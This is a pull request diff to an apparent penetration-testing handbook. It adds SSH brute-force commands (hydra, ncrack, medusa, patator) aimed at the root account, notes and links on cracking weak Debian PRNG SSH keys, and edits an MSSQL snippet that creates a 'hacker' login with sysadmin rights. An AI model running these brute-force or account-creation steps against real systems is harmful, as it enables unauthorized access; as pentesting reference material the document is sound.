### PR TITLE
Added Debian weak PRNG ssh keys and brute force tool

### DIFF
--- a/generic-methodologies-and-resources/brute-force.md
+++ b/generic-methodologies-and-resources/brute-force.md
@@ -383,6 +383,18 @@ hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for
 nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
 ```
 
+### SSH
+
+```bash
+hydra -l root -P passwords.txt [-t 32] <IP> ssh
+ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
+medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
+patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
+```
+
+#### Weak SSH keys / Debian predictable PRNG
+Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
+
 ### SQL Server
 
 ```bash
@@ -392,15 +404,6 @@ hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
 medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
 nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
 msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
-```
-
-### SSH
-
-```bash
-hydra -l root -P passwords.txt [-t 32] <IP> ssh
-ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
-medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
-patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
 ```
 
 ### Telnet

--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -131,7 +131,7 @@ SELECT * FROM sys.servers;
 select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
 #Create user with sysadmin privs
 CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
-sp_addsrvrolemember 'hacker', 'sysadmin'
+EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
 ```
 
 #### Get User

--- a/network-services-pentesting/pentesting-ssh.md
+++ b/network-services-pentesting/pentesting-ssh.md
@@ -131,9 +131,10 @@ msf> use scanner/ssh/ssh_enumusers
 
 Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below.
 
-### Private/Public Keys BF
+### Private Key Brute Force
 
-If you know some ssh private key that could be used... lets try it. You can use the nmap script:
+If you know some ssh private keys that could be used... let's try it. You can use the nmap script:
+
 
 ```
 https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
@@ -145,9 +146,14 @@ Or the MSF auxiliary module:
 msf> use scanner/ssh/ssh_identify_pubkeys
 ```
 
+Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
+
 #### Known badkeys can be found here:
 
 {% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
+
+#### Weak SSH keys / Debian predictable PRNG
+Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
 
 You should look here in order to search for valid keys for the victim machine.
 


### PR DESCRIPTION
I added some entries about the Debian weak PRNG ssh keys with links to g0tmilk's repo and a python3 script (ssh-keybrute.py) I wrote myself after being frustrated with dependencies of old python2 / ruby code. No offense taken if you want to reword / reformat any of my changes to make them inline with the project :)

Keep up the good work!